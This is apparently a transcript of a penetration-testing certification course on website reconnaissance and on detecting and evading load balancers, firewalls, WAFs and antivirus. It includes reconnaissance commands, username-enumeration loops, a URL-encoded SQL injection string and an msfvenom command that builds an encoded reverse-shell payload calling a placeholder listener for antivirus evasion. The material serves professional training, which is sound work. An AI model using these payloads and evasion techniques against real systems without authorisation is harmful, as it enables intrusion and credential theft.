CompTIA Pentest+ PT0-002 – Section 5: Active Reconnaissance Part 3


41. Website Reconnaissance (OBJ 2.3)

There are a lot of websites online, and many organizations are seriously invested in their websites to reach new customers or to sell their products to existing customers. For this reason, you're often going to find yourself conducting a lot of penetration tests and engagements that involve website reconnaissance and website attacks and exploits. To conduct website reconnaissance and enumeration, you're going to need to determine what type of software is used to run the organization's website, what type of operating system the server is using, and whether the server is hosted by the organization themselves under a first-party hosting model or hosted by a third-party cloud provider. During website reconnaissance and enumeration, you're going to seek to discover the resources that are in use by that underlying server, as well as any hidden information that may be exposed by the organization on their website.

When you're investigating a website's code, you're going to find that it was either individually created by a programmer or a team of programmers who built the site using HTML, CSS, JavaScript and other languages, or, more commonly, that the site was built on top of a content management system, known as a CMS. If you're dealing with a small business, you may find that they're using a simple page builder instead. Content management systems are very popular these days, and the largest and most well-known of these is WordPress.

WordPress currently runs 62% of all CMS-based websites, and over 37% of all internet websites rely on WordPress. Once you identify what type of software is being used to run the website, such as WordPress, Drupal, Joomla, Shopify or another CMS, you can then identify vulnerabilities that exist for those particular frameworks and platforms and use those in your exploitation phase against that target organization's website. Now, if the organization created their own website from scratch using HTML, CSS, JavaScript or other languages, you're going to have to hunt for the vulnerabilities to attack yourself.

These include things like SQL injections, XML injections, cross-site scripting and caching server attacks. We’re going to cover all these attacks and more once we get to domain three, attacks and exploits. For now, just realize that you need to identify as much information as possible about that target website including the functions it has for e-commerce, searching of content and taking input from its end users because these are all common areas that you can exploit.

When enumerating a website, it's important to find every page that exists on that website, because any page could hold the vulnerability that becomes the key to success during your exploitation phase. For example, if you go to diontraining.com, you can click on every link on every page and in every menu to create a site map based on all the visible pages. But we have several pages that are not linked from any other pages on our website or in our website menus. For example, I have a few landing pages that we've created that you're only going to get a link to if you're part of a certain email marketing sequence in our customer relationship management system. But as a penetration tester, you need to find those pages too.

So how can you do it? Well, you can do it using a technique known as website crawling or forced browsing. Website crawling is the process of systematically attempting to find every page on a given website. For example, Google's search engine is constantly crawling every website in the world, trying to identify every page on those sites so it can add those pages to its search index. By default, these web crawlers, also known as spiders, are going to come across pages that were meant to be hidden from end users, and that can cause that data to be exposed to the public.

To prevent this, web developers create a small text file called robots.txt. Now the robots.txt file is used to tell these web crawlers which directories and paths are allowed to be crawled and which ones should be ignored. As a penetration tester though, you should always check the robots.txt file because this will list areas that the web developers don’t want the public to see. To access the robots.txt file, simply go to the website’s URL and add /robots.txt to the end.

For example, you could go to diontraining.com/robots.txt right now, and you'll see a simple four-line text file displayed. The first line says user-agent: *. This says which web crawler the following lines are targeting or referring to. In my case, we have the star (asterisk) there, meaning this applies to all spiders or web crawlers. If I wanted to address just Google, I could change that star so the line reads user-agent: Googlebot. The second line says disallow: /wp-admin. This tells the spiders not to search and index my /wp-admin directory. The third line says allow: /wp-admin/admin-ajax.php. This tells the spiders they're allowed to index that PHP file called admin-ajax even though it is inside the wp-admin folder. The fourth line says sitemap: https://www.diontraining.com/wp-sitemap.xml.

Now, this tells the spiders that we have a file containing all the links we definitely want them to index, and we provide that in an XML format. This is known as a sitemap. Now, based on just looking at this robots.txt file, can you start to guess what kind of software our website is using at diontraining.com? If you guessed WordPress, you'd be right. You can usually tell a WordPress site by seeing the /wp-admin directory, because this is a standard configuration that's going to be created by the default installation.
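If you want to see the file for yourself, you can fetch it from the command line. Laid out as a file, the four lines described above would look roughly like this (a reconstruction based on the description in this lesson; the live file may differ):

curl -s https://diontraining.com/robots.txt
# Expected output (reconstructed from the description above):
User-agent: *
Disallow: /wp-admin
Allow: /wp-admin/admin-ajax.php
Sitemap: https://www.diontraining.com/wp-sitemap.xml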

Just because you don’t see wp-admin though doesn’t mean it’s not a WordPress site because you can reconfigure that admin directory to anything you want such as /admin, /settings or even /jasondion if you really wanted to. Now with that said, from a security standpoint, you don’t want to rely on the robots.txt file to keep the bots from scanning your entire website because they sometimes will ignore the robots.txt file too. As a website owner, we need to make sure we’re enabling directory permissions to block unauthorized users and bots from getting to any content we don’t want them to see. Now website crawlers use automation techniques to follow every single link on your website, but they won’t necessarily find all the pages that aren’t linked anywhere like those landing pages I mentioned earlier on my site. To find these, you’re going to need to know the URL to go to and enter it manually in your browser or you’re going to have to use a tool like DirBuster which is a brute force browsing tool.

Now DirBuster is a free tool by OWASP that’s going to conduct brute force web crawling by trying all the various combinations of directories and file names to find hidden data. For example, if you’ve ever used a website like pastebin, you’re going to see that they save everybody’s post using a random series of uppercase letters, lowercase letter and numbers to make links that you can share your post with. If you go to pastebin.com/X24FiSMv, for example, you’re going to see I posted a short sentence as a message to my students in this course. Now without me giving you that link, it would take you a really long time to brute force the URL and find that message because it’s pretty darn random. But with enough time, DirBuster will eventually find it. Now if you use DirBuster, eventually you’re going to randomly find another URL such as pastebin.com/RMiGaVfW and if you go there, you’re going to see another post I made that is publicly available to anybody who knows that URL.
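To make the idea concrete, here is a minimal shell sketch of what forced browsing automates; the target and wordlist name are placeholders, and DirBuster itself does this with much larger wordlists and a graphical interface:

# Hypothetical forced-browsing loop: try each path from a wordlist and
# report anything that does not come back as a 404.
while read path; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.example/${path}")
  [ "$code" != "404" ] && echo "Found: /${path} (HTTP ${code})"
done < wordlist.txt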

You could randomly enter combinations of eight letters and numbers and find other people's posts by brute forcing, and that's exactly what DirBuster would do for you automatically on any given website.

Now, another concept in website reconnaissance is that of scraping websites, also known as web scraping, web harvesting or web data extraction. Web scraping is a technique used for extracting data from websites by performing automated or manual processes. For example, there's a software tool called CeWL, which is C-E-W-L. This stands for custom word list generator, and it works in Kali Linux. CeWL is a Ruby app that can crawl any given URL up to a specified depth and return a list of all the words that could be used with a password cracker. CeWL also has the ability to crawl a website and create a list of every email address it finds, if you set it up that way. Both of these lists are going to be useful when trying to conduct password-cracking attacks in your exploitation phase, because many people create passwords out of common words associated with their business, industry or personal life, and many usernames are actually just people's email addresses.

For example, maybe the about us page on their website listed that the CEO is married with two children, where they went to college, and maybe some other details that we could feed in as potential words for the password cracker's word list. That word list can then be combined as part dictionary, part brute force to create a hybrid password-cracking attack and eventually gain access to the network. To use CeWL, you'll simply enter the common syntax of cewl -d 1 -m 6 -w wordlist.txt https://diontraining.com. What this tells the tool is that CeWL will check the main webpage of diontraining.com, scan down to a depth of one level below the top directory structure, and add each word it finds that's at least six letters long to a file called wordlist.txt. If you want to learn more about CeWL, you can simply enter cewl -h at the Kali command prompt.
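Here is a hedged sketch of how that might look in practice; the extra email-harvesting flags and the follow-on John the Ripper command are assumptions about typical usage, so check cewl -h and your cracker's documentation for the exact options in your versions:

# Build a word list from the site, as described in the lesson:
cewl -d 1 -m 6 -w wordlist.txt https://diontraining.com

# Assumed variant that also harvests email addresses found while crawling:
cewl -d 1 -m 6 -e --email_file emails.txt -w wordlist.txt https://diontraining.com

# Example of feeding the result into a hybrid (dictionary plus rules) attack:
john --wordlist=wordlist.txt --rules hashes.txt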

The final thing we need to cover in website reconnaissance has more to do with enumeration of users than the website itself, but since we're going to use the organization's website to conduct this enumeration, I'm going to cover it in this lesson. Now, if you want to determine whether a user account is valid or not, you can simply try entering it into the username field along with any random password. Most of the time you're going to get an error like "user does not exist," in which case you know the username you're trying isn't valid. On the other hand, if you get an error such as "password incorrect," you know the username is correct, but you haven't found the correct password yet. If this is the case, you can move into password attacks and try to gain access using that username you've just discovered. This enumeration technique used to work really well in the old days, but many sites have improved their error messages to provide us with less information. For example, on my website, if you go to diontraining.com and you try to enter an email with an invalid password, we're going to give you an error message that says "invalid username or password," which means you don't know which one is wrong. It could be the user's login, it could be the password, or it could be both.

That said, many websites still use two separate error messages, one for users such as "user does not exist" and one for passwords such as "password incorrect." For example, when I tried to use my work email to log into Facebook with a random password, I got an error message stating the email you entered isn't connected to an account. Now, this is because I use a different email to log into my Facebook account and not my work email. And so now you know that regardless of what password you try, you're never going to access my Facebook account using that particular email. In this case, if you're conducting an engagement that involves getting into my Facebook account, you're going to need to go back to your reconnaissance efforts to determine the correct email associated with my Facebook account and then try to crack the password again.
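As a rough illustration, here's a minimal shell sketch of automating this check; the login URL, form field names and error strings are all hypothetical placeholders rather than any real site's API:

# Hypothetical username-enumeration loop based on differing error messages.
while read user; do
  resp=$(curl -s -X POST "https://target.example/login" \
              -d "username=${user}&password=NotARealPassword123")
  if echo "$resp" | grep -qi "password incorrect"; then
    echo "Likely valid username: ${user}"
  fi
done < usernames.txt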

42. Detecting and Evading Defenses (OBJ 2.2)

In this lesson, we're going to talk about the importance of detecting defenses during active reconnaissance so that later you can evade those defenses as you're moving into your attacks and exploits phase. Now, there are a few key defenses that almost every network these days is going to use, and this includes things like load balancers, firewalls, web application firewalls and antivirus. Let's take a look at each of these, how you can detect them, and how you can possibly avoid them. The first thing we need to detect is whether or not the organization is using a load balancer. A load balancer is not necessarily a security device, but it is something that can cause trouble for us as we're trying to scan, enumerate and attack the network. A load balancer is a core networking solution that's used to distribute traffic across multiple servers inside of a server farm.

For example, say you're working with somebody who has a cloud-based network, you start doing scans against it, and you're sending requests into their network toward a particular server. If they're using a load balancer, the first request might go to server A, the second request might go to server B, and the third request goes to server C. So you may be getting back different answers and different responses based upon which server actually handled the request you sent. This is why it's important to understand whether there is a load balancer or not. Now, from an operational perspective, load balancers are great for an organization because they allow multiple servers to answer as if they were a single server. For example, on my site, we use a load balancer, and we have to do that because of the number of students visiting our site; a single server couldn't handle all of that load.

Now, as you start scanning, you need to identify whether or not there is a load balancer. One of the easiest ways to do this is by using a tool called LBD, or the load balancing detector. This is an app you can use inside of Kali Linux. To use the load balancing detector, simply enter lbd and the domain name you want to test. For example, if you enter lbd diontraining.com, you'll be able to check if diontraining.com is using a load balancer. And as you can see here, we are using a load balancer. You can see that both in the DNS, which is using a load-balancing function, and in the website itself, and the tool returns the two IP addresses that are found as part of our load-balancing configuration. So why are load balancers so important to understand as you're doing your reconnaissance and enumeration? Well, it all goes back to scanning. If the organization is using a load balancer, it can really throw off your scan results and create a lot of false positives or false negatives for you.
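If you want to try this yourself, a couple of quick command-line checks look something like the following; the exact output will vary, and the DNS check is only a hint rather than proof of load balancing:

# lbd tests for DNS- and HTTP-based load balancing:
lbd diontraining.com

# Multiple A records returned for the same name often suggest round-robin DNS:
dig +short diontraining.com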

The next thing we need to discuss is firewalls. Now, if you think back to your earlier studies, you should remember that a firewall is a type of network security device that monitors and filters incoming and outgoing network traffic based upon the organization's established security policies. Normally, this is done by using access control lists. At their most basic level, firewalls are simply there to act as a barrier device that sits between the private and trusted internal network and the public or exposed external network known as the internet. As I said, firewalls really rely on a set of rules known as an access control list, or ACL. Most of these rules are going to be based either on the destination port and IP address or the source port and IP address, as well as the protocol type and payload. One of the easiest ways to detect whether or not an organization is using a firewall is simply by running a traceroute. If you do a traceroute from your machine to your destination and you see that responses stop coming back and instead you're seeing stars in the places where those responses should be, that indicates there is some sort of security device there, whether that's a firewall, a router with an ACL that's not responding back, or a unified threat management system.
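From the command line, that check might look something like this; the domain is just the example used throughout this lesson, and the exact hop where the stars begin will vary:

# Hops that stop answering and show up only as "* * *" near the target
# often indicate a firewall, filtering router, or UTM in the path.
traceroute -n diontraining.com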

There are lots of different tools out there to help you map out a firewall, and one of the most common is known as Firewalk. Now, Firewalk can be used inside of Kali Linux, and you'll specify the command firewalk, the ports you want to use, the interface, and then the target. When you do this, it's going to start working through those targets on those ports to figure out what responses it can get: which ports are open, which ones are closed, which ones are being filtered, and, more importantly, what those ACL rules might look like. Firewalk is considered an active reconnaissance tool, and its job is to try to determine which layer 4 protocols a given firewall will actually pass through it. This helps you map out the ACL rule sets. It works by sending out either TCP or UDP packets with a time to live that is one hop greater than the targeted gateway. If the firewall or gateway allows the traffic to pass, it forwards the traffic to the next hop, and because the time to live expires there, that next hop responds back with an ICMP time exceeded message. Otherwise, the firewall drops the packet and there will be no response.
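Here's a hedged sketch of what a Firewalk invocation might look like; the interface name, port range, and the two addresses (the gateway under test and a host sitting behind it) are all placeholders, so check the tool's help output for the exact option syntax in your version:

# Attempt to determine which of these TCP ports the gateway at 192.0.2.1
# will pass through toward the host 192.0.2.10 sitting behind it:
firewalk -S 1-1024 -i eth0 -n -p tcp 192.0.2.1 192.0.2.10

# nmap also ships a script that performs a similar technique:
nmap --script=firewalk --traceroute 192.0.2.10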

By collecting this series of responses and non-responses, we can determine what ACL rules are in place, and then we can figure out how to better evade or bypass that firewall during our attacks and exploits. The real benefit of using firewalking versus just doing port scanning is that you're actually trying to move through that firewall and identify what those rule sets are. This is how you can start mapping out the internal network, as opposed to just the boundary device that you see when you do a regular port scan of the firewall. Now, in addition to a regular firewall, we also have a specialized type of firewall called a web application firewall, or layer 7 firewall.

This is a specialized type of firewall that's designed to monitor web applications and prevent attacks against them, things like SQL injections, directory traversals and cross-site scripting attacks. Now, to detect if there's a web application firewall in place, there are a couple of key giveaways you should be looking for. Most web application firewalls will add a personalized cookie to the HTTP packets they send back to somebody who's scanning them or trying to send data through the web application firewall.

By looking at those cookies in the HTTP packets, you can identify if there's a web application firewall in place. Some other web application firewalls will actually use header alteration, which changes the original response header to help confuse the attacker. So if you start seeing header responses that look abnormal, there may be a web application firewall in place. And sometimes web application firewalls are just very blatant about the fact that they're there. They may send you back a page or a header that says this site has blocked your request because it's protected by such-and-such web application firewall.
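A couple of quick checks along these lines might look like the following; the grep pattern is just an assumption about what to look for, and wafw00f is a separate fingerprinting tool that ships with Kali:

# Look at response headers and cookies for tell-tale WAF fingerprints:
curl -s -I https://diontraining.com | grep -iE "server|set-cookie"

# wafw00f automates WAF fingerprinting against a target URL:
wafw00f https://diontraining.com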

As far as evading these web application firewalls and getting your attacks through them, what you're going to have to do is use obfuscation to confuse these devices by making it so they can't see the data as easily. When we talked about URL analysis, some of that was being done in an effort to bypass web application firewalls, because if they're looking for something like a space but you use %20, the URL-encoded version of a space, instead, that is a form of obfuscation that can actually get past a web application firewall, depending on how it's configured.
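For example, a payload with its special characters percent-encoded might look like this; the target URL and parameter are hypothetical, and whether this slips past a given WAF depends entirely on how that WAF is configured:

# %27 decodes to a single quote and %20 to a space, so this sends ' OR '1'='1
# in a form a naive literal-match rule might not recognize:
curl -s "https://target.example/search?q=%27%20OR%20%271%27%3D%271"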

Now, the final thing we need to talk about is antivirus. Antivirus is a specific type of software that's designed to prevent, scan for, detect and delete viruses or malware from a computer. Once it's installed, most antivirus software will run automatically in the background to provide real-time protection against virus attacks. Now, what is the problem with antivirus? Well, when we're doing scanning, it's usually not a big deal here in the reconnaissance phase, but as we move into attacks and exploits, it can become a real problem for us. A lot of times, the malware we deliver as part of a spear phishing campaign or other exploit will actually make it onto the machine, but if that person has antivirus installed, it can detect the payload and block it from running, effectively killing our attack. While that's good for the company, it's not very good for us as penetration testers.

So we need to find ways to bypass and get past these antivirus systems. Now, there are a couple of ways you can do this. One is that you can create a metamorphic virus. This will actually transform the virus as it propagates around the network, and this changing pattern makes it harder for antivirus to detect. Remember, most of the effective antivirus solutions out there are actually based on signatures.

And so if you change the signature by jumbling up the code or modifying the code, that can actually create a way for you to get past those systems. Another way to do this is by obfuscating a known signature using specialized tools. This will actually allow you to change the code of your exploit, similar to a metamorphic virus. Now, a metamorphic virus is going to continue to change as it propagates, but when we're dealing with obfuscation of our own code or our own exploits, we're only doing it on a one-time basis for this particular attack.
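As one hedged example of this kind of tooling, msfvenom from the Metasploit Framework can run a payload through an encoder for several iterations; the listener address below is a placeholder, and note that well-known encoders like this one are themselves heavily signatured by modern antivirus:

# Encode a reverse-shell payload for 10 iterations to alter its signature:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.0.2.5 LPORT=4444 \
         -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe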

Another thing you can do is use specialized tools or payloads that rely on fileless malware, because a lot of functions embedded in the operating system can actually be used to conduct malicious activities for you. These include things like PowerShell scripts, cmdlets, bash utilities and others. These become very difficult to detect, and it's basically another form of living off the land. Another method is to use encryption.

Now, by using encryption, you can effectively eliminate the ability for that antivirus program to detect the malware through signatures alone. Malware authors and penetration testers will often encrypt their malicious payloads. This allows them to encrypt the file and attach a stub, which is simply a small program that will decrypt the contents and execute them once they're on the victim's machine. Some common ways to execute this are by using process injection or process hollowing, which we'll talk about more when we get to attacks and exploits. As you can see, it's important to detect load balancers, firewalls, web application firewalls and antivirus software back here in your reconnaissance and information gathering phase, because that's going to allow us to prepare for how we're going to evade them later when we get to our attacks and exploits phase.
